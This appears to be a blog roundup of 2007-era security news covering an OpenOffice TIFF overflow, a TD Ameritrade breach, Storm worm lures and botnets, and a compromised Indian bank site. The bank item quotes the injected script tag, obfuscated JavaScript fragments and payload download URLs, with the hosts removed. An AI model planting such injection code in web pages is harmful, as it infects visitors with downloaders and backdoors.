OpenOffice 2 TIFF Parsing Integer Overflow Vulnerabilities

Some vulnerabilities have been reported in
OpenOffice, which potentially can be exploited by malicious people to
compromise a user’s system.

The vulnerabilities are caused by integer overflows when processing
certain tags within TIFF images. This can be exploited to cause
heap-based buffer overflows by e.g. tricking a user into opening a
specially crafted document.

Successful exploitation may allow the execution of arbitrary code.

The vulnerabilities are reported in versions prior to 2.3.

Update to version 2.3. 

Hacker Gained Access To Data On Millions Of TD Ameritrade Customers

Online brokerage TD Ameritrade Holding Corp. announced today that a
hacker broke into one of its databases and stole personally identifying
information for some of its 6.3 million customers.

An online advisory
and letters to account holders disclosed that names, e-mail addresses,
phone numbers and home addresses were taken in the data breach. Client
assets, along with user IDs, personal identification numbers and
passwords, were not stored in the compromised database.


Windows worm targets Skype users

An instant-messaging worm has started spreading to PCs running Windows
by using Skype to chat up potential victims in an attempt to convince
them to download and run the malicious software.

The worm, described in a blog post
written by eBay’s Skype subsidiary, can converse with victims in at
least three different languages: Latvian, Russian, and English.
Antivirus firms and eBay have already assigned a plethora of names to
the digital pest, including Ramex (Skype), Pykspa (Symantec), Skipi
(F-Secure), and Pykse (McAfee and others). 


Custom-built botnet steals eBay accounts

Online auction site eBay
has been targeted by identity thieves, who are wielding a botnet that
uses brute force to uncover valid account login info, an Israeli
security company said Monday.

The attacks against eBay may have started as long ago as early
August, said Ofer Elzam, of Aladdin Knowledge Systems Ltd. Elzam and
his researchers have not been successful in notifying eBay of their
weekend findings.

According to Elzam, the product manager of Aladdin’s eSafe
threat protection line, the brute force attacks are launched by a large
botnet that the identity thieves have built using a sophisticated,
multi-stage campaign that begins with compromised legitimate Web sites.


Better Business Bureau Scam Updated

Websense® Security Labs(TM) has received reports of a new variant of an
email attack that was originally launched early this year. The spoofed
email purports to be from the Better Business Bureau (BBB). The message
claims that a complaint has been filed against the recipient’s company.

The original email attack contained an attachment that the victim would need to
open in order to become infected. The new variant is slightly different.

The new message uses a tactic employed by other, more-successful email
attacks, such as the recent Storm worm. Instead of including an
attachment in the email, the body of the email contains a link to an
external Web site from which the payload is downloaded if the link is
accessed. This method allows the attack to bypass many attachment
filters at the email gateway.

Storm adds YouTube lures

The Storm Trojan / Bot continues to
spread and is now using a YouTube video to lure users. The latest
version has a variety of subjects and email bodies but now uses the
filename video.exe.

Email subject example: Sheesh man what are you thinkin.

Upon connecting to the URL, which is
referenced as a YouTube link but is actually a Storm IP, the same
exploit code used in past attacks attempts to run. As in the past, if
users are not vulnerable, they will get a page that requests
they run the code manually, such as in the screenshot below:

 Websense Alert


Attackers probing for vulnerable Windows servers

Attackers are probing for Windows servers running Trend Micro Inc.’s ServerProtect antivirus software, researchers warned.

Early today, Symantec Corp.’s
DeepSight threat network monitored a major spike in traffic over TCP
port 5168, which is related to the remote procedure call service in
ServerProtect. “This may indicate an ongoing mass-scanning and
exploitation attempt trying to exploit vulnerable systems for the newly
disclosed vulnerabilities,” said Symantec analyst Pukhraj Singh in an
alert issued to corporate customers.


Syndicate Bank site compromised

Websense® Security Labs(TM) has discovered that the official site for Indian Syndicate Bank
was compromised with a malicious script that attempts to exploit
multiple vulnerabilities. When customers visit the web site, a
malicious JavaScript file (e.js) is executed and creates two additional
iframes in the page.

<script src=http://< URL REMOVED >/e.js></script>

Snippet of js code:

document.writeln("\/\/xxxx mca By Mr.0wen\/\/");

%220%22%20FraMebOrder %3D%220%22%3E%3C\/IFraMe%3E\"));");
document.writeln("\/\/xxxx mca By Mr.0wen\/\/");

JavaScript from e.js (seen above) creates two new IFRAME elements
within the page. One IFRAME attempts to load exploit code and the other
creates several additional IFRAMEs that contain advertisement-related
content. The exploit will try to load a Trojan Downloader (qq.exe)
which will contact a remote server to download the following Trojan
Downloader and Backdoor:

http://< URL REMOVED >/hxw/hx/200512.exe
http://< URL REMOVED >/hxw/hx/dd.exe

The site appears to have been cleaned a few hours ago.


Zero-Day Bug In Yahoo Messenger Pops Up

Researchers at McAfee are reporting that they’ve reproduced a reported zero-day vulnerability in the Yahoo Messenger Webcam.

Karthik Raman, a researcher with McAfee, first reported in a Tuesday blog entry
that Chinese researchers were claiming to have found a zero-day bug in
Yahoo Messenger. On Wednesday, Raman’s fellow McAfee researcher Wei
Wang noted in a blog entry that they have been able to reproduce the vulnerability on Messenger V8.1.0.413.

Storm Warning: Worm Threat Escalates

The Storm worm has grown into an online siege 10 times larger than any
other e-mail attack in the last two years, amassing a botnet of nearly
2 million computers, with worrying implications, researchers say.

Before Storm, an average day saw about 1 million virus-laden e-mails
crossing the Internet, says Adam Swidler, senior manager of software
security firm Postini. On July 24, researchers tracked 46.2 million
malicious messages, more than 99% of them from the Storm worm.

The number of zombie computers the Storm worm authors have amassed has
skyrocketed in the past two months, says SecureWorks senior researcher
Joe Stewart. From the first of January to the end of May, there were
2,815 bots launching Storm attacks. By the end of July, that number had
leaped to 1.7 million. “It’s been building with exponential growth,”
says Stewart. “It’s one of the largest botnets I’ve ever heard of.”


© 2017 DP's Bits & Bytes.